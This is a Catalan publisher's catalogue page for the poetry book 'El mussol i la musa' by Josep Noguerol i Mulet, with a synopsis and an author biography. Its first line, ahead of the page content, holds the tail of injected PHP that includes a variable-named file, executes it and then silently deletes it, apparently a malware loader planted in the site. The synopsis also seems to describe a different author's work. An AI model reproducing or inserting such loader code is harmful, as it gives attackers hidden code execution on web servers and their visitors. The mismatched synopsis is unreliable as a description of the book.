");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - El mussol i la musa
Cercador d'Obres
ORDENAR:
Començar recerca

El mussol i la musa

Noguerol i Mulet, Josep

Col·lecció:
Magatzem Can Toni
Tema:
Poesia
Pàgines:
152
PVP:
14.00
ISBN:
978-84-96376-92-2
Data d'Edició:
01/02/2007
Sinopsi
AMB LA VIDA EN VERS TENS A LES MANS una branqueta de roser on han brotonat, entre espines, centenars de roses de mil colors, fent vera la dita del refrany: «Sense espines, no hi ha roses»; i és que sense les picades o braverols que cada dia pateix el nostre poble, tampoc no haurien guaixat els pètals de tantes gloses, una filigrana diària que la premsa va oferir durant tot l’any 2004. Gabriel Janer Manila, mestre de literatura popular, les ha vistes així: «Jo diria que les dècimes de Miquel Julià –les gloses d’en Jordi Guaita– contenen totes les característiques de les dècimes satíriques del segle XIX: són crítiques i punyents, i vives. Aboquen sal i pebre pel broc gros… Quasi tothom arriba a rebre nesples, castanyes, serves, cireres, dolces, galletes i verdanc a rompre. He de dir, finalment, que són sàtires saludables com una dutxa d’aigua fresca: netegen l’esperit i renten el cos.»
Josep Noguerol i Mulet
(Palma, 1957)
Llicenciat en Filologia Hispànica i Catalana. S'inicià al món de la literatura com a redactor de la revista de premsa forana Voramar de Peguera als setze anys. Fou un dels organitzadors de les cinc mostres de poesia jove de la UIB (1976-82) i de la seva edició, membre de la revista L'Ombra Vessada, col·laboracions poètiques a Blanc d'Ou, Poetry&Sons, Lavativa, Escalbruix, Quadern d'Eivissa, Reduccions de Vic... Literàries a Lluc, El Mirall, Latitud 39... Diverses publicacions sobre toponímia del terme de Calvià. Dos poemaris publicats, Estones d'ones (1982) i Terra groga (1983). Professor d'institut de català al llarg de deu anys per Formentera, Menorca, Eivissa, Sóller, Alcúdia i Palma (1988-98). L'any 2000 va publicar el llibre de poesia La ciutat tankada. El 2002, La caravana de la poesia (premi Bernat Vidal i Tomàs), el catàleg de l'exposició itinerant dels seus poemes amb fotomuntatges de Pino Sturniolo Imatges de la ciutat tankada i el llibre de contes Camí de Kazakhstan i altres narracions (dins aquesta mateixa col·lecció). L'any 2006 va publicar la novel·la La flama marina.


Recomanar
Comentar
Comentaris (0)